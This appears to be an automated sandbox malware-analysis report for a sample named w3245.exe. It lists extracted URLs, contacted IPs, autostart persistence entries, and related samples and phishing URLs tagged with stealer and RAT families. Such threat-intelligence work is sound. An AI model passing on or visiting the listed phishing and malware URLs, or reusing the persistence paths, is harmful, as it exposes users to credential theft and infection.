                                                            http://www.???.xx/?search=%sRescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000000.1972974789.00000001401E0000.00000002.00000001.01000000.0000001C.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://qt.digia.com/product/licensingRescueCDBurner.exe, 00000003.00000002.1776972727.000000006B68E000.00000002.00000001.01000000.00000015.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://trolltech.com/xml/features/report-start-end-entityUnknownRescueCDBurner.exe, 00000002.00000002.1715868582.000000006BED9000.00000002.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000002.00000003.1697665872.0000000001812000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1777625557.000000006CC89000.00000002.00000001.01000000.00000014.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/nRescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.symauth.com/cps0(RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.reneelab.com.cn/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstRescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.reneelab.it/reimpostare-passwordi-di-windows-login.htmlRescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://isecure.reneelab.com.cn/webapi.php?code=http://isecure-a.reneelab.com/webapi.php?code=http://RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.symauth.com/rpa00RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.info-zip.org/RescueCDBurner.exe, 00000002.00000002.1714490543.0000000009FC4000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B36000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004BF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://trolltech.com/xml/features/report-start-end-entityRescueCDBurner.exe, 00000002.00000002.1715868582.000000006BED9000.00000002.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000002.00000003.1697665872.0000000001812000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1777625557.000000006CC89000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                    		high
                                                                    http://www.winimage.com/zLibDllRescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                      		high
                                                                      http://www.reneelab.com/RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://isecure.reneelab.com/webapi.php?code=RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()RescueCDBurner.exe, 00000002.00000002.1716689796.000000006C7E9000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000003.00000002.1777743809.000000006CD59000.00000002.00000001.01000000.00000013.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://trolltech.com/xml/features/report-whitespace-only-CharDataRescueCDBurner.exe, 00000002.00000002.1715868582.000000006BED9000.00000002.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000002.00000003.1697665872.0000000001812000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1777625557.000000006CC89000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                        		high
                                                                        http://www.surfok.de/cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://downloads.reneelab.com.cn/passnow/passnow_RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.reneelab.biz/redefinir-senha-de-admin-logon-windows.htmlhttp://support.reneelab.com/anonyRescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.softwareok.comRescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000000.1972974789.00000001401E0000.00000002.00000001.01000000.0000001C.sdmpfalse
                                                                          		high
                                                                          http://appsyndication.org/2006/appsynw3245.exefalse
                                                                            		high
                                                                            http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurchaRescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            23.57.90.157
                                                                            		unknownUnited States
                                                                            		35994AKAMAI-ASUSfalse
                                                                            20.189.173.4
                                                                            		unknownUnited States
                                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                            108.139.47.50
                                                                            		unknownUnited States
                                                                            		16509AMAZON-02USfalse
                                                                            162.159.61.3
                                                                            		unknownUnited States
                                                                            		13335CLOUDFLARENETUSfalse
                                                                            20.110.205.119
                                                                            		unknownUnited States
                                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                            204.79.197.219
                                                                            		unknownUnited States
                                                                            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                            142.250.186.97
                                                                            		googlehosted.l.googleusercontent.comUnited States
                                                                            		15169GOOGLEUSfalse
                                                                            172.64.41.3
                                                                            		chrome.cloudflare-dns.comUnited States
                                                                            		13335CLOUDFLARENETUSfalse
                                                                            23.57.90.149
                                                                            		unknownUnited States
                                                                            		35994AKAMAI-ASUSfalse
                                                                            18.244.18.32
                                                                            		sb.scorecardresearch.comUnited States
                                                                            		16509AMAZON-02USfalse
                                                                            104.21.80.52
                                                                            		bamarelakij.siteUnited States
                                                                            		13335CLOUDFLARENETUSfalse
                                                                            239.255.255.250
                                                                            		unknownReserved
                                                                            		unknownunknownfalse

                                                                            Private

                                                                            IP
                                                                            192.168.2.4

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1584991
                                                                            Start date and time:2025-01-06 23:03:08 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 10m 28s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:32
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:w3245.exe
                                                                            Detection:MAL
                                                                            Classification:mal80.spyw.evad.winEXE@72/347@23/13
                                                                            EGA Information:
                                                                            • Successful, ratio: 50%
                                                                            HCA Information:
                                                                            • Successful, ratio: 100%
                                                                            • Number of executed functions: 116
                                                                            • Number of non-executed functions: 270
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 13.107.42.16, 204.79.197.203, 13.107.21.239, 204.79.197.239, 142.250.185.78, 13.107.6.158, 172.205.25.163, 2.16.168.107, 2.16.168.113, 2.19.97.195, 2.19.97.170, 2.23.227.215, 2.23.227.208, 2.23.209.36, 2.23.209.29, 2.23.209.28, 2.23.209.35, 2.23.209.45, 2.23.209.25, 2.23.209.33, 2.23.209.34, 2.23.209.48, 13.74.129.1, 204.79.197.237, 13.107.21.237, 2.16.168.115, 2.16.168.122, 48.209.162.134, 142.250.64.67, 142.250.80.99, 142.250.176.195, 23.200.88.28, 23.200.88.26, 23.200.88.27, 23.200.88.32, 23.200.88.31, 23.200.88.34, 23.200.88.29, 23.200.88.33, 23.200.88.30, 20.109.210.53, 52.149.20.212, 23.56.254.164, 13.107.246.45, 40.126.32.136, 13.107.246.40, 4.152.133.8, 20.96.153.111, 23.57.90.105, 142.250.80.10, 23.46.156.51
                                                                            • Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, edgeassetservice.afd.azureedge.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, prod-agic-ne-9.northeurope.cloudapp.azure.com, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www.googleapis.com, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, mira.config.skype.com, config.edge.skype.com.trafficmanager.net, c-ms
                                                                            • Execution Graph export aborted for target RescueCDBurner.exe, PID 5828 because there are no executed function
                                                                            • Execution Graph export aborted for target RescueCDBurner.exe, PID 6296 because there are no executed function
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                            • Report size getting too big, too many NtWriteFile calls found.
                                                                            • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: w3245.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            17:04:00API Interceptor1x Sleep call for process: w3245.exe modified
                                                                            17:04:38API Interceptor13x Sleep call for process: LocalCtrl_alpha_v3.exe modified
                                                                            22:04:18AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT5346.tmp
                                                                            22:04:31AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helpmonitorv3.lnk
                                                                            22:05:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                            22:05:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            108.139.47.50random.exeGet hashmaliciousUnknownBrowse
                                                                              HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                  QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                    T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                      file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                            https://nekofile.eu.org/f8e2cb54931bf39d6c12eo5ncGet hashmaliciousUnknownBrowse
                                                                                              http://www.sdmts.com/business-center/for-hire-vehicle-administration&c=E,1,pc5oom8YsW1RqHtANaUTLgMvd2z37r_4n-NR90jlF12Z7NyUKYXr1sKmCXY3dgMIENHwNl8jxylzX2garHrVx3wU2gE5fuDMBydZQ2COLEQJ&typo=1Get hashmaliciousUnknownBrowse
                                                                                                162.159.61.317360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                  Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                                    Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                      random.exeGet hashmaliciousUnknownBrowse
                                                                                                        random.exeGet hashmaliciousUnknownBrowse
                                                                                                          http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                            Setup.exe.7zGet hashmaliciousUnknownBrowse
                                                                                                              over.ps1Get hashmaliciousVidarBrowse
                                                                                                                MJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                                                                                                  MJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                                                                                                    23.57.90.157file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                      20.189.173.4Document Review for Recent Transaction - Signature requested by Xiomara Baldwin Support Team.emlGet hashmaliciousLure-BasedAttackBrowse
                                                                                                                        FW_ Signature Required For Agreement with ID_41392PJBM8759674.msgGet hashmaliciousUnknownBrowse
                                                                                                                          phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                              phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                                                                                                                                https://forms.office.com/r/kiNP3VZaGzGet hashmaliciousUnknownBrowse
                                                                                                                                  23eb97f4-980c-745d-c5e2-6fdb70189e48.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                    Teams.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                      9d565bee-e6ce-1842-e729-b0df8f08ed34.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                        SecuriteInfo.com.Trojan.Agent.19085.17583.exeGet hashmaliciousUnknownBrowse

                                                                                                                                          Domains

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          sb.scorecardresearch.comYoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 18.173.166.9
                                                                                                                                          random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 13.32.110.104
                                                                                                                                          random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 18.244.18.27
                                                                                                                                          nv8401986_110422.exeGet hashmaliciousQjwmonkeyBrowse
                                                                                                                                          • 18.244.18.122
                                                                                                                                          over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                          • 18.244.18.27
                                                                                                                                          6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 18.244.18.38
                                                                                                                                          25F.tmp.exeGet hashmaliciousDarkbotBrowse
                                                                                                                                          • 18.244.18.38
                                                                                                                                          BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 18.244.18.122
                                                                                                                                          Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 18.161.69.30
                                                                                                                                          Hwacaj.exeGet hashmaliciousDarkbotBrowse
                                                                                                                                          • 18.161.69.8
                                                                                                                                          chrome.cloudflare-dns.com17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • 172.64.41.3
                                                                                                                                          Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                                                                          • 162.159.61.3
                                                                                                                                          Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.64.41.3
                                                                                                                                          Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 162.159.61.3
                                                                                                                                          random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 162.159.61.3
                                                                                                                                          random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.64.41.3
                                                                                                                                          http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                          • 162.159.61.3
                                                                                                                                          EwpsQzeky5.msiGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.64.41.3
                                                                                                                                          Setup.exe.7zGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.64.41.3
                                                                                                                                          over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                          • 162.159.61.3
                                                                                                                                          fg.microsoft.map.fastly.netFLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                                                                                                                          • 199.232.214.172
                                                                                                                                          nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                          • 199.232.214.172
                                                                                                                                          ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          ko.ps1.2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                          • 199.232.214.172

                                                                                                                                          ASNs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          MICROSOFT-CORP-MSN-AS-BLOCKUShttps://app.saner.ai/shared/notes/7353e5ae-dd5f-410b-92c3-210c9e88052aGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 13.107.246.61
                                                                                                                                          https://u43161309.ct.sendgrid.net/ls/click?upn=u001.L9-2FCbhkaoUACh7As3yZ8i4iABGphfl-2FJgS6Xiu1aw6I-3DgXpA_qO4VbBWAKg4gLfGs-2BfuSyZki3gKzG4I1DrYN15Q8fD7JV1twLeLo1AFs1GBSG3ZgA22dFJdXJloKc56aXDeV3olJKTBJd8NprednZ2LeXdX-2BkcSQE-2F2FRwgBng5RbUCLfjS8-2FI3mrpwyYu9lRatIB62qUwPSax-2Fhh2c7R-2B7pT3Kos0wK0SEJGj4ZMkgOGYhEniKYT7Kn7jN25xFz2sFdtPlVQkIdCFKwDNWmq-2BrAxerZE2GuKgfkuf3l1UY4J42sOOltybAAVyLhV-2BXfmbuQpN4NpshXRIuhta8ho3ChcTA5NtgjludQThyLtwhGns-2ByLqSbpO1Bhhc-2FCgdgP-2BAOxYrGHvKHjVYRr6-2BiryADxfM-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 20.185.72.223
                                                                                                                                          AllItems.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 13.107.136.10
                                                                                                                                          Vernales Restaurant-encrypted.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 13.107.246.60
                                                                                                                                          https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956235d3ed2bb80da1204238e412cdfe561cf1e7cff409a79a97da8a2d431ccef9065ebae57f03416d61f0971abb897fde199a21f0da5d9085251df31eb6747d99920190103a51a045e3e309308fa5f3a1ca3&action_type=SIGNGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 13.107.246.45
                                                                                                                                          http://click.pstmrk.itGet hashmaliciousUnknownBrowse
                                                                                                                                          • 20.10.16.51
                                                                                                                                          DownloadedMessage.zipGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 40.126.32.138
                                                                                                                                          http://phothockey.chGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                          • 13.107.42.14
                                                                                                                                          https://hacdct-my.sharepoint.com/:f:/g/personal/dmarra_hacdct_org/El0CfhNMVMNNuzPj6QGnrSQBywVLNW96w_XrX10UdRlfmQ?email=dhodder%40haigroup.com&e=d37USF&xsdata=MDV8MDJ8am1ja2lubGV5QGhhaWdyb3VwLmNvbXwyYzYxNmM3ZDhlNmU0YWM5MDJlMjA4ZGQyZTYzYjFmMnw4MjgxNWI4YzM3NzU0NTk5OTdjNzJiODc1MjhlNmY4M3wwfDB8NjM4NzE3NzMyNjY3MjIxNDQzfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXw0MDAwfHx8&sdata=bXM5KzduUjdVc3RFaFJsU1ZBR1d1enMxT3I3VitIdmc4MUlhZ25WT3dmWT0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.47.55.156
                                                                                                                                          https://hacdct-my.sharepoint.com/:f:/g/personal/dmarra_hacdct_org/El0CfhNMVMNNuzPj6QGnrSQBywVLNW96w_XrX10UdRlfmQ?email=dhodder%40haigroup.com&e=d37USF&xsdata=MDV8MDJ8am1ja2lubGV5QGhhaWdyb3VwLmNvbXwyYzYxNmM3ZDhlNmU0YWM5MDJlMjA4ZGQyZTYzYjFmMnw4MjgxNWI4YzM3NzU0NTk5OTdjNzJiODc1MjhlNmY4M3wwfDB8NjM4NzE3NzMyNjY3MjIxNDQzfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXw0MDAwfHx8&sdata=bXM5KzduUjdVc3RFaFJsU1ZBR1d1enMxT3I3VitIdmc4MUlhZ25WT3dmWT0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.47.55.156
                                                                                                                                          AMAZON-02UShttps://app.saner.ai/shared/notes/7353e5ae-dd5f-410b-92c3-210c9e88052aGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 13.33.187.74
                                                                                                                                          Jeffparish.docxGet hashmaliciousUnknownBrowse
                                                                                                                                          • 34.249.87.52
